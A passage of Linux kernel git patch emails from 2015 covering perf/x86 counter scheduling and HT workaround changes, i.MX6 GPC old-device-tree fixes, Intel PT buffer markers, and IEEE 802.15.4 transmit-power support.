(event->hw.flags & PERF_X86_EVENT_PEBS_LDLAT) cpuc->pebs_enabled &= ~(1ULL << (hwc->idx + 32)); - else if (event->hw.constraint->flags & PERF_X86_EVENT_PEBS_ST) + else if (event->hw.flags & PERF_X86_EVENT_PEBS_ST) cpuc->pebs_enabled &= ~(1ULL << 63); if (cpuc->enabled) diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.c b/arch/x86/kernel/cpu/perf_event_intel_uncore.c index c635b8b49e93..ec2ba578d286 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.c +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.c @@ -365,9 +365,8 @@ static int uncore_assign_events(struct intel_uncore_box *box, int assign[], int bitmap_zero(used_mask, UNCORE_PMC_IDX_MAX); for (i = 0, wmin = UNCORE_PMC_IDX_MAX, wmax = 0; i < n; i++) { - hwc = &box->event_list[i]->hw; c = uncore_get_event_constraint(box, box->event_list[i]); - hwc->constraint = c; + box->event_constraint[i] = c; wmin = min(wmin, c->weight); wmax = max(wmax, c->weight); } @@ -375,7 +374,7 @@ static int uncore_assign_events(struct intel_uncore_box *box, int assign[], int /* fastpath, try to reuse previous register */ for (i = 0; i < n; i++) { hwc = &box->event_list[i]->hw; - c = hwc->constraint; + c = box->event_constraint[i]; /* never assigned */ if (hwc->idx == -1) @@ -395,7 +394,7 @@ static int uncore_assign_events(struct intel_uncore_box *box, int assign[], int } /* slow path */ if (i != n) - ret = perf_assign_events(box->event_list, n, + ret = perf_assign_events(box->event_constraint, n, wmin, wmax, assign); if (!assign || ret) { diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.h b/arch/x86/kernel/cpu/perf_event_intel_uncore.h index 6c8c1e7e69d8..f789ec9a0133 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.h +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.h @@ -97,6 +97,7 @@ struct intel_uncore_box { atomic_t refcnt; struct perf_event *events[UNCORE_PMC_IDX_MAX]; struct perf_event *event_list[UNCORE_PMC_IDX_MAX]; + struct event_constraint *event_constraint[UNCORE_PMC_IDX_MAX]; unsigned long active_mask[BITS_TO_LONGS(UNCORE_PMC_IDX_MAX)]; u64 tags[UNCORE_PMC_IDX_MAX]; struct pci_dev *pci_dev; diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h index 61992cf2e977..d8a82a89f35a 100644 --- a/include/linux/perf_event.h +++ b/include/linux/perf_event.h @@ -92,8 +92,6 @@ struct hw_perf_event_extra { int idx; /* index in shared_regs->regs[] */ }; -struct event_constraint; - /** * struct hw_perf_event - performance event hardware details: */ @@ -112,8 +110,6 @@ struct hw_perf_event { struct hw_perf_event_extra extra_reg; struct hw_perf_event_extra branch_reg; - - struct event_constraint *constraint; }; struct { /* software */ struct hrtimer hrtimer; From 634a603760c26d163ff92751d91ac7b859e879c4 Mon Sep 17 00:00:00 2001 From: Lucas Stach Date: Tue, 26 May 2015 18:43:36 +0200 Subject: [PATCH 283/872] ARM: imx6: allow booting with old DT The GPC rewrite to IRQ domains has been on the premise that it may break suspend/resume for new kernels on old DT, but otherwise keep things working from a user perspective. This was an accepted compromise to be able to move the GIC cleanup forward. What actually happened was that booting a new kernel on an old DT crashes before even the console is up, so the user does not even see the warning that the DT is too old. The warning message suggests that this has been known before, which is clearly unacceptable. Fix the early crash by mapping the GPC memory space if the IRQ controller doesn't claim it. This keeps at least CPUidle and the needed CPU wakeup workarounds working. 
With this fixed the system is able to boot up properly minus the expected suspend/resume breakage. Signed-off-by: Lucas Stach Signed-off-by: Shawn Guo --- arch/arm/mach-imx/gpc.c | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/arch/arm/mach-imx/gpc.c b/arch/arm/mach-imx/gpc.c index 4d60005e9277..bbf015056221 100644 --- a/arch/arm/mach-imx/gpc.c +++ b/arch/arm/mach-imx/gpc.c @@ -280,9 +280,15 @@ void __init imx_gpc_check_dt(void) struct device_node *np; np = of_find_compatible_node(NULL, NULL, "fsl,imx6q-gpc"); - if (WARN_ON(!np || - !of_find_property(np, "interrupt-controller", NULL))) - pr_warn("Outdated DT detected, system is about to crash!!!\n"); + if (WARN_ON(!np)) + return; + + if (WARN_ON(!of_find_property(np, "interrupt-controller", NULL))) { + pr_warn("Outdated DT detected, suspend/resume will NOT work\n"); + + /* map GPC, so that at least CPUidle and WARs keep working */ + gpc_base = of_iomap(np, 0); + } } #ifdef CONFIG_PM_GENERIC_DOMAINS From cc1790cf541553263bda024295d7600c7cd7c45d Mon Sep 17 00:00:00 2001 From: Peter Zijlstra Date: Thu, 21 May 2015 10:57:17 +0200 Subject: [PATCH 284/872] perf/x86: Improve HT workaround GP counter constraint The (SNB/IVB/HSW) HT bug only affects events that can be programmed onto GP counters, therefore we should only limit the number of GP counters that can be used per cpu -- iow we should not constrain the FP counters. Furthermore, we should only enforce such a limit when there are in fact exclusive events being scheduled on either sibling. Reported-by: Vince Weaver Signed-off-by: Peter Zijlstra (Intel) Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner [ Fixed build fail for the !CONFIG_CPU_SUP_INTEL case. ] Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event.c | 36 +++++++++++++++---- arch/x86/kernel/cpu/perf_event.h | 15 ++++++-- arch/x86/kernel/cpu/perf_event_intel.c | 30 ++++++---------- arch/x86/kernel/cpu/perf_event_intel_uncore.c | 2 +- 4 files changed, 53 insertions(+), 30 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event.c b/arch/x86/kernel/cpu/perf_event.c index 1664eeea65e0..2eca19422454 100644 --- a/arch/x86/kernel/cpu/perf_event.c +++ b/arch/x86/kernel/cpu/perf_event.c @@ -611,6 +611,7 @@ struct sched_state { int event; /* event index */ int counter; /* counter index */ int unassigned; /* number of events to be assigned left */ + int nr_gp; /* number of GP counters used */ unsigned long used[BITS_TO_LONGS(X86_PMC_IDX_MAX)]; }; @@ -620,9 +621,10 @@ struct sched_state { struct perf_sched { int max_weight; int max_events; + int max_gp; + int saved_states; struct event_constraint **constraints; struct sched_state state; - int saved_states; struct sched_state saved[SCHED_STATES_MAX]; }; @@ -630,13 +632,14 @@ struct perf_sched { /* * Initialize interator that runs through all events and counters.
*/ static void perf_sched_init(struct perf_sched *sched, struct event_constraint **constraints, - int num, int wmin, int wmax) + int num, int wmin, int wmax, int gpmax) { int idx; memset(sched, 0, sizeof(*sched)); sched->max_events = num; sched->max_weight = wmax; + sched->max_gp = gpmax; sched->constraints = constraints; for (idx = 0; idx < num; idx++) { @@ -696,11 +699,16 @@ static bool __perf_sched_find_counter(struct perf_sched *sched) goto done; } } + /* Grab the first unused counter starting with idx */ idx = sched->state.counter; for_each_set_bit_from(idx, c->idxmsk, INTEL_PMC_IDX_FIXED) { - if (!__test_and_set_bit(idx, sched->state.used)) + if (!__test_and_set_bit(idx, sched->state.used)) { + if (sched->state.nr_gp++ >= sched->max_gp) + return false; + goto done; + } } return false; @@ -757,11 +765,11 @@ static bool perf_sched_next_event(struct perf_sched *sched) * Assign a counter for each event. */ int perf_assign_events(struct event_constraint **constraints, int n, - int wmin, int wmax, int *assign) + int wmin, int wmax, int gpmax, int *assign) { struct perf_sched sched; - perf_sched_init(&sched, constraints, n, wmin, wmax); + perf_sched_init(&sched, constraints, n, wmin, wmax, gpmax); do { if (!perf_sched_find_counter(&sched)) @@ -822,8 +830,24 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) /* slow path */ if (i != n) { + int gpmax = x86_pmu.num_counters; + + /* + * Do not allow scheduling of more than half the available + * generic counters. + * + * This helps avoid counter starvation of sibling thread by + * ensuring at most half the counters cannot be in exclusive + * mode. There is no designated counters for the limits. Any + * N/2 counters can be used. This helps with events with + * specific counter constraints. 
+ */ + if (is_ht_workaround_enabled() && !cpuc->is_fake && + READ_ONCE(cpuc->excl_cntrs->exclusive_present)) + gpmax /= 2; + unsched = perf_assign_events(cpuc->event_constraint, n, wmin, - wmax, assign); + wmax, gpmax, assign); } /* diff --git a/arch/x86/kernel/cpu/perf_event.h b/arch/x86/kernel/cpu/perf_event.h index fdfaab7c5e55..ef78516850fb 100644 --- a/arch/x86/kernel/cpu/perf_event.h +++ b/arch/x86/kernel/cpu/perf_event.h @@ -74,6 +74,7 @@ struct event_constraint { #define PERF_X86_EVENT_EXCL 0x0040 /* HT exclusivity on counter */ #define PERF_X86_EVENT_DYNAMIC 0x0080 /* dynamic alloc'd constraint */ #define PERF_X86_EVENT_RDPMC_ALLOWED 0x0100 /* grant rdpmc permission */ +#define PERF_X86_EVENT_EXCL_ACCT 0x0200 /* accounted EXCL event */ struct amd_nb { @@ -134,8 +135,6 @@ enum intel_excl_state_type { struct intel_excl_states { enum intel_excl_state_type init_state[X86_PMC_IDX_MAX]; enum intel_excl_state_type state[X86_PMC_IDX_MAX]; - int num_alloc_cntrs;/* #counters allocated */ - int max_alloc_cntrs;/* max #counters allowed */ bool sched_started; /* true if scheduling has started */ }; @@ -144,6 +143,11 @@ struct intel_excl_cntrs { struct intel_excl_states states[2]; + union { + u16 has_exclusive[2]; + u32 exclusive_present; + }; + int refcnt; /* per-core: #HT threads */ unsigned core_id; /* per-core: core id */ }; @@ -176,6 +180,7 @@ struct cpu_hw_events { struct perf_event *event_list[X86_PMC_IDX_MAX]; /* in enabled order */ struct event_constraint *event_constraint[X86_PMC_IDX_MAX]; + int n_excl; /* the number of exclusive events */ unsigned int group_flag; int is_fake; @@ -719,7 +724,7 @@ static inline void __x86_pmu_enable_event(struct hw_perf_event *hwc, void x86_pmu_enable_all(int added); int perf_assign_events(struct event_constraint **constraints, int n, - int wmin, int wmax, int *assign); + int wmin, int wmax, int gpmax, int *assign); int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign); void x86_pmu_stop(struct perf_event *event, int flags); @@ -930,4 +935,8 @@ static inline struct intel_shared_regs *allocate_shared_regs(int cpu) return NULL; } +static inline int is_ht_workaround_enabled(void) +{ + return 0; +} #endif /* CONFIG_CPU_SUP_INTEL */ diff --git a/arch/x86/kernel/cpu/perf_event_intel.c b/arch/x86/kernel/cpu/perf_event_intel.c index 7a58fb5df15c..a1e35c9f06b9 100644 --- a/arch/x86/kernel/cpu/perf_event_intel.c +++ b/arch/x86/kernel/cpu/perf_event_intel.c @@ -1923,7 +1923,6 @@ intel_start_scheduling(struct cpu_hw_events *cpuc) xl = &excl_cntrs->states[tid]; xl->sched_started = true; - xl->num_alloc_cntrs = 0; /* * lock shared state until we are done scheduling * in stop_event_scheduling() @@ -2000,6 +1999,11 @@ intel_get_excl_constraints(struct cpu_hw_events *cpuc, struct perf_event *event, * across HT threads */ is_excl = c->flags & PERF_X86_EVENT_EXCL; + if (is_excl && !(event->hw.flags & PERF_X86_EVENT_EXCL_ACCT)) { + event->hw.flags |= PERF_X86_EVENT_EXCL_ACCT; + if (!cpuc->n_excl++) + WRITE_ONCE(excl_cntrs->has_exclusive[tid], 1); + } /* * xl = state of current HT @@ -2008,18 +2012,6 @@ intel_get_excl_constraints(struct cpu_hw_events *cpuc, struct perf_event *event, xl = &excl_cntrs->states[tid]; xlo = &excl_cntrs->states[o_tid]; - /* - * do not allow scheduling of more than max_alloc_cntrs - * which is set to half the available generic counters. - * this helps avoid counter starvation of sibling thread - * by ensuring at most half the counters cannot be in - * exclusive mode. There is not designated counters for the - * limits. 
Any N/2 counters can be used. This helps with - * events with specifix counter constraints - */ - if (xl->num_alloc_cntrs++ == xl->max_alloc_cntrs) - return &emptyconstraint; - cx = c; /* @@ -2150,6 +2142,11 @@ static void intel_put_excl_constraints(struct cpu_hw_events *cpuc, xl = &excl_cntrs->states[tid]; xlo = &excl_cntrs->states[o_tid]; + if (hwc->flags & PERF_X86_EVENT_EXCL_ACCT) { + hwc->flags &= ~PERF_X86_EVENT_EXCL_ACCT; + if (!--cpuc->n_excl) + WRITE_ONCE(excl_cntrs->has_exclusive[tid], 0); + } /* * put_constraint may be called from x86_schedule_events() @@ -2632,8 +2629,6 @@ static void intel_pmu_cpu_starting(int cpu) cpuc->lbr_sel = &cpuc->shared_regs->regs[EXTRA_REG_LBR]; if (x86_pmu.flags & PMU_FL_EXCL_CNTRS) { - int h = x86_pmu.num_counters >> 1; - for_each_cpu(i, topology_thread_cpumask(cpu)) { struct intel_excl_cntrs *c; @@ -2647,11 +2642,6 @@ static void intel_pmu_cpu_starting(int cpu) } cpuc->excl_cntrs->core_id = core_id; cpuc->excl_cntrs->refcnt++; - /* - * set hard limit to half the number of generic counters - */ - cpuc->excl_cntrs->states[0].max_alloc_cntrs = h; - cpuc->excl_cntrs->states[1].max_alloc_cntrs = h; } } diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.c b/arch/x86/kernel/cpu/perf_event_intel_uncore.c index ec2ba578d286..dd319e59246b 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.c +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.c @@ -395,7 +395,7 @@ static int uncore_assign_events(struct intel_uncore_box *box, int assign[], int /* slow path */ if (i != n) ret = perf_assign_events(box->event_constraint, n, - wmin, wmax, assign); + wmin, wmax, n, assign); if (!assign || ret) { for (i = 0; i < n; i++) From aa319bcd366349c6f72fcd331da89d3d06090651 Mon Sep 17 00:00:00 2001 From: Alexander Shishkin Date: Fri, 22 May 2015 18:30:20 +0300 Subject: [PATCH 285/872] perf: Disallow sparse AUX allocations for non-SG PMUs in overwrite mode PMUs that don't support hardware scatter tables require big contiguous chunks of memory and a PMI to switch between them. However, in overwrite using a PMI for this purpose adds extra overhead that the users would like to avoid. Thus, in overwrite mode for such PMUs we can only allow one contiguous chunk for the entire requested buffer. This patch changes the behavior accordingly, so that if the buddy allocator fails to come up with a single high-order chunk for the entire requested buffer, the allocation will fail. Signed-off-by: Alexander Shishkin Signed-off-by: Peter Zijlstra (Intel) Cc: Linus Torvalds Cc: Paul Mackerras Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: acme@infradead.org Cc: adrian.hunter@intel.com Cc: hpa@zytor.com Link: http://lkml.kernel.org/r/1432308626-18845-2-git-send-email-alexander.shishkin@linux.intel.com Signed-off-by: Ingo Molnar --- kernel/events/ring_buffer.c | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/kernel/events/ring_buffer.c b/kernel/events/ring_buffer.c index 232f00f273cb..725c416085e3 100644 --- a/kernel/events/ring_buffer.c +++ b/kernel/events/ring_buffer.c @@ -493,6 +493,20 @@ int rb_alloc_aux(struct ring_buffer *rb, struct perf_event *event, rb->aux_pages[rb->aux_nr_pages] = page_address(page++); } + /* + * In overwrite mode, PMUs that don't support SG may not handle more + * than one contiguous allocation, since they rely on PMI to do double + * buffering. In this case, the entire buffer has to be one contiguous + * chunk. 
+ */ + if ((event->pmu->capabilities & PERF_PMU_CAP_AUX_NO_SG) && + overwrite) { + struct page *page = virt_to_page(rb->aux_pages[0]); + + if (page_private(page) != max_order) + goto out; + } + rb->aux_priv = event->pmu->setup_aux(event->cpu, rb->aux_pages, nr_pages, overwrite); if (!rb->aux_priv) From f73ec48c90016f89d05726f6c48e66991a790fd7 Mon Sep 17 00:00:00 2001 From: Alexander Shishkin Date: Fri, 22 May 2015 18:30:22 +0300 Subject: [PATCH 286/872] perf/x86/intel/pt: Untangle pt_buffer_reset_markers() Currently, pt_buffer_reset_markers() is a difficult to read knot of arithmetics with a redundant check for multiple-entry TOPA capability, a commented out wakeup marker placement and a logical error wrt to stop marker placement. The latter happens when write head is not page aligned and results in stop marker being placed one page earlier than it actually should. All these problems only affect PT implementations that support multiple-entry TOPA tables (read: proper scatter-gather). For single-entry TOPA implementations, there is no functional impact. This patch deals with all of the above. Tested on both single-entry and multiple-entry TOPA PT implementations. Signed-off-by: Alexander Shishkin Signed-off-by: Peter Zijlstra (Intel) Cc: Linus Torvalds Cc: Paul Mackerras Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: acme@infradead.org Cc: adrian.hunter@intel.com Cc: hpa@zytor.com Link: http://lkml.kernel.org/r/1432308626-18845-4-git-send-email-alexander.shishkin@linux.intel.com Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event_intel_pt.c | 34 +++++++++++++++-------- 1 file changed, 22 insertions(+), 12 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event_intel_pt.c b/arch/x86/kernel/cpu/perf_event_intel_pt.c index ffe666c2c6b5..5b804f96ad66 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_pt.c +++ b/arch/x86/kernel/cpu/perf_event_intel_pt.c @@ -615,7 +615,8 @@ static int pt_buffer_reset_markers(struct pt_buffer *buf, struct perf_output_handle *handle) { - unsigned long idx, npages, end; + unsigned long head = local64_read(&buf->head); + unsigned long idx, npages, wakeup; if (buf->snapshot) return 0; @@ -634,17 +635,26 @@ static int pt_buffer_reset_markers(struct pt_buffer *buf, buf->topa_index[buf->stop_pos]->stop = 0; buf->topa_index[buf->intr_pos]->intr = 0; - if (pt_cap_get(PT_CAP_topa_multiple_entries)) { - npages = (handle->size + 1) >> PAGE_SHIFT; - end = (local64_read(&buf->head) >> PAGE_SHIFT) + npages; - /*if (end > handle->wakeup >> PAGE_SHIFT) - end = handle->wakeup >> PAGE_SHIFT;*/ - idx = end & (buf->nr_pages - 1); - buf->stop_pos = idx; - idx = (local64_read(&buf->head) >> PAGE_SHIFT) + npages - 1; - idx &= buf->nr_pages - 1; - buf->intr_pos = idx; - } + /* how many pages till the STOP marker */ + npages = handle->size >> PAGE_SHIFT; + + /* if it's on a page boundary, fill up one more page */ + if (!offset_in_page(head + handle->size + 1)) + npages++; + + idx = (head >> PAGE_SHIFT) + npages; + idx &= buf->nr_pages - 1; + buf->stop_pos = idx; + + wakeup = handle->wakeup >> PAGE_SHIFT; + + /* in the worst case, wake up the consumer one page before hard stop */ + idx = (head >> PAGE_SHIFT) + npages - 1; + if (idx > wakeup) + idx = wakeup; + + idx &= buf->nr_pages - 1; + buf->intr_pos = idx; buf->topa_index[buf->stop_pos]->stop = 1; buf->topa_index[buf->intr_pos]->intr = 1; From 68ab747604da98f0a0414f197f346ac22888fcee Mon Sep 17 00:00:00 2001 From: Don Zickus Date: Mon, 18 May 2015 15:16:48 -0400 Subject: [PATCH 287/872] perf/x86: Tweak broken BIOS rules during 
check_hw_exists() I stumbled upon an AMD box that had the BIOS using a hardware performance counter. Instead of printing out a warning and continuing, it failed and blocked further perf counter usage. Looking through the history, I found this commit: a5ebe0ba3dff ("perf/x86: Check all MSRs before passing hw check") which tweaked the rules for a Xen guest on an almost identical box and now changed the behaviour. Unfortunately the rules were tweaked incorrectly and will always lead to MSR failures even though the MSRs are completely fine. What happens now is in arch/x86/kernel/cpu/perf_event.c::check_hw_exists(): for (i = 0; i < x86_pmu.num_counters; i++) { reg = x86_pmu_config_addr(i); ret = rdmsrl_safe(reg, &val); if (ret) goto msr_fail; if (val & ARCH_PERFMON_EVENTSEL_ENABLE) { bios_fail = 1; val_fail = val; reg_fail = reg; } } /* * Read the current value, change it and read it back to see if it * matches, this is needed to detect certain hardware emulators * (qemu/kvm) that don't trap on the MSR access and always return 0s. */ reg = x86_pmu_event_addr(0); ^^^^ if the first perf counter is enabled, then this routine will always fail because the counter is running. :-( if (rdmsrl_safe(reg, &val)) goto msr_fail; val ^= 0xffffUL; ret = wrmsrl_safe(reg, val); ret |= rdmsrl_safe(reg, &val_new); if (ret || val != val_new) goto msr_fail; The above bios_fail used to be a 'goto' which is why it worked in the past. Further, most vendors have migrated to using fixed counters to hide their evilness hence this problem rarely shows up nowadays except on a few old boxes. I fixed my problem and kept the spirit of the original Xen fix, by recording a safe non-enable register to be used safely for the reading/writing check. Because it is not enabled, this passes on bare metal boxes (like mine), but should continue to throw an msr_fail on Xen guests because the register isn't emulated yet. Now I get a proper bios_fail error message and Xen should still see their msr_fail message (untested). Signed-off-by: Don Zickus Signed-off-by: Peter Zijlstra (Intel) Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: george.dunlap@eu.citrix.com Cc: konrad.wilk@oracle.com Link: http://lkml.kernel.org/r/1431976608-56970-1-git-send-email-dzickus@redhat.com Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event.c | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/arch/x86/kernel/cpu/perf_event.c b/arch/x86/kernel/cpu/perf_event.c index 2eca19422454..4f7001f28936 100644 --- a/arch/x86/kernel/cpu/perf_event.c +++ b/arch/x86/kernel/cpu/perf_event.c @@ -190,6 +190,7 @@ static bool check_hw_exists(void) u64 val, val_fail, val_new= ~0; int i, reg, reg_fail, ret = 0; int bios_fail = 0; + int reg_safe = -1; /* * Check to see if the BIOS enabled any of the counters, if so @@ -204,6 +205,8 @@ static bool check_hw_exists(void) bios_fail = 1; val_fail = val; reg_fail = reg; + } else { + reg_safe = i; } } @@ -221,12 +224,23 @@ static bool check_hw_exists(void) } } + /* + * If all the counters are enabled, the below test will always + * fail. The tools will also become useless in this scenario. + * Just fail and disable the hardware counters. + */ + + if (reg_safe == -1) { + reg = reg_safe; + goto msr_fail; + } + /* * Read the current value, change it and read it back to see if it * matches, this is needed to detect certain hardware emulators * (qemu/kvm) that don't trap on the MSR access and always return 0s.
*/ - reg = x86_pmu_event_addr(0); + reg = x86_pmu_event_addr(reg_safe); if (rdmsrl_safe(reg, &val)) goto msr_fail; val ^= 0xffffUL; From b17c70cd9211e9bbcd77a489f9c60f3d1bd4c392 Mon Sep 17 00:00:00 2001 From: Lucas Stach Date: Wed, 27 May 2015 10:10:26 +0200 Subject: [PATCH 288/872] ARM: imx6: gpc: don't register power domain if DT data is missing If the devicetree is too old and does not provide the regulator and clocks for the power domain, we need to avoid registering the power domain. Otherwise runtime PM will try to control the domain, which will lead to machine hangs without the proper DT configuration data. This restores functionality to the kernel 4.0 level if an old DT is detected, where the power domain is constantly powered on. Signed-off-by: Lucas Stach Signed-off-by: Shawn Guo --- arch/arm/mach-imx/gpc.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/arch/arm/mach-imx/gpc.c b/arch/arm/mach-imx/gpc.c index bbf015056221..6d0893a3828e 100644 --- a/arch/arm/mach-imx/gpc.c +++ b/arch/arm/mach-imx/gpc.c @@ -449,6 +449,10 @@ static int imx_gpc_probe(struct platform_device *pdev) struct regulator *pu_reg; int ret; + /* bail out if DT too old and doesn't provide the necessary info */ + if (!of_property_read_bool(pdev->dev.of_node, "#power-domain-cells")) + return 0; + pu_reg = devm_regulator_get_optional(&pdev->dev, "pu"); if (PTR_ERR(pu_reg) == -ENODEV) pu_reg = NULL; From 0f999b09f5c1b135e840501840dbcd01fad66f79 Mon Sep 17 00:00:00 2001 From: Varka Bhadram Date: Wed, 27 May 2015 09:10:54 +0530 Subject: [PATCH 289/872] ieee802154: add set transmit power support This patch adds transmission power setting support for IEEE-802.15.4 devices via nl802154. Signed-off-by: Varka Bhadram Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 1 + net/ieee802154/nl802154.c | 30 ++++++++++++++++++++++++++++++ net/ieee802154/rdev-ops.h | 12 ++++++++++++ net/ieee802154/trace.h | 15 +++++++++++++++ net/mac802154/cfg.c | 19 +++++++++++++++++++ 5 files changed, 77 insertions(+) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 4de59aa96173..2e3bb012c2ff 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -44,6 +44,7 @@ struct cfg802154_ops { int (*set_channel)(struct wpan_phy *wpan_phy, u8 page, u8 channel); int (*set_cca_mode)(struct wpan_phy *wpan_phy, const struct wpan_phy_cca *cca); + int (*set_tx_power)(struct wpan_phy *wpan_phy, s32 power); int (*set_pan_id)(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, __le16 pan_id); int (*set_short_addr)(struct wpan_phy *wpan_phy, diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 212a795b33c9..5c9d524ba02c 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -783,6 +783,28 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) return rdev_set_cca_mode(rdev, &cca); } +static int nl802154_set_tx_power(struct sk_buff *skb, struct genl_info *info) +{ + struct cfg802154_registered_device *rdev = info->user_ptr[0]; + s32 power; + int i; + + if (!(rdev->wpan_phy.flags & WPAN_PHY_FLAG_TXPOWER)) + return -EOPNOTSUPP; + + if (!info->attrs[NL802154_ATTR_TX_POWER]) + return -EINVAL; + + power = nla_get_s32(info->attrs[NL802154_ATTR_TX_POWER]); + + for (i = 0; i < rdev->wpan_phy.supported.tx_powers_size; i++) { + if (power == rdev->wpan_phy.supported.tx_powers[i]) + return rdev_set_tx_power(rdev, power); + } + + return -EINVAL; +} + static int nl802154_set_pan_id(struct sk_buff *skb, struct genl_info *info) { struct 
cfg802154_registered_device *rdev = info->user_ptr[0]; @@ -1093,6 +1115,14 @@ static const struct genl_ops nl802154_ops[] = { .internal_flags = NL802154_FLAG_NEED_WPAN_PHY | NL802154_FLAG_NEED_RTNL, }, + { + .cmd = NL802154_CMD_SET_TX_POWER, + .doit = nl802154_set_tx_power, + .policy = nl802154_policy, + .flags = GENL_ADMIN_PERM, + .internal_flags = NL802154_FLAG_NEED_WPAN_PHY | + NL802154_FLAG_NEED_RTNL, + }, { .cmd = NL802154_CMD_SET_PAN_ID, .doit = nl802154_set_pan_id, diff --git a/net/ieee802154/rdev-ops.h b/net/ieee802154/rdev-ops.h index 7b5a9dd94fe5..36456118a6ec 100644 --- a/net/ieee802154/rdev-ops.h +++ b/net/ieee802154/rdev-ops.h @@ -74,6 +74,18 @@ rdev_set_cca_mode(struct cfg802154_registered_device *rdev, return ret; } +static inline int +rdev_set_tx_power(struct cfg802154_registered_device *rdev, + s32 power) +{ + int ret; + + trace_802154_rdev_set_tx_power(&rdev->wpan_phy, power); + ret = rdev->ops->set_tx_power(&rdev->wpan_phy, power); + trace_802154_rdev_return_int(&rdev->wpan_phy, ret); + return ret; +} + static inline int rdev_set_pan_id(struct cfg802154_registered_device *rdev, struct wpan_dev *wpan_dev, __le16 pan_id) diff --git a/net/ieee802154/trace.h b/net/ieee802154/trace.h index 5ac25eb6ed17..1f1cecc420d7 100644 --- a/net/ieee802154/trace.h +++ b/net/ieee802154/trace.h @@ -93,6 +93,21 @@ TRACE_EVENT(802154_rdev_set_channel, __entry->page, __entry->channel) ); +TRACE_EVENT(802154_rdev_set_tx_power, + TP_PROTO(struct wpan_phy *wpan_phy, s32 power), + TP_ARGS(wpan_phy, power), + TP_STRUCT__entry( + WPAN_PHY_ENTRY + __field(s32, power) + ), + TP_fast_assign( + WPAN_PHY_ASSIGN; + __entry->power = power; + ), + TP_printk(WPAN_PHY_PR_FMT ", power: %d", WPAN_PHY_PR_ARG, + __entry->power) +); + TRACE_EVENT(802154_rdev_set_cca_mode, TP_PROTO(struct wpan_phy *wpan_phy, const struct wpan_phy_cca *cca), TP_ARGS(wpan_phy, cca), diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index d5290ea49dca..ab12fa296eb3 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -105,6 +105,24 @@ ieee802154_set_cca_mode(struct wpan_phy *wpan_phy, return ret; } +static int +ieee802154_set_tx_power(struct wpan_phy *wpan_phy, s32 power) +{ + struct ieee802154_local *local = wpan_phy_priv(wpan_phy); + int ret; + + ASSERT_RTNL(); + + if (wpan_phy->transmit_power == power) + return 0; + + ret = drv_set_tx_power(local, power); + if (!ret) + wpan_phy->transmit_power = power; + + return ret; +} + static int ieee802154_set_pan_id(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, __le16 pan_id) @@ -195,6 +213,7 @@ const struct cfg802154_ops mac802154_config_ops = { .del_virtual_intf = ieee802154_del_iface, .set_channel = ieee802154_set_channel, .set_cca_mode = ieee802154_set_cca_mode, + .set_tx_power = ieee802154_set_tx_power, .set_pan_id = ieee802154_set_pan_id, .set_short_addr = ieee802154_set_short_addr, .set_backoff_exponent = ieee802154_set_backoff_exponent, From dec169eccc26b12a533856a7fea87a245c47c11d Mon Sep 17 00:00:00 2001 From: Varka Bhadram Date: Wed, 27 May 2015 14:21:06 +0530 Subject: [PATCH 290/872] ieee802154: fix typo for file name Signed-off-by: Varka Bhadram Signed-off-by: Marcel Holtmann --- net/ieee802154/trace.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/ieee802154/trace.h b/net/ieee802154/trace.h index 1f1cecc420d7..ac790bb1b4fe 100644 --- a/net/ieee802154/trace.h +++ b/net/ieee802154/trace.h @@ -1,4 +1,4 @@ -/* Based on net/wireless/tracing.h */ +/* Based on net/wireless/trace.h */ #undef TRACE_SYSTEM #define TRACE_SYSTEM cfg802154 From 
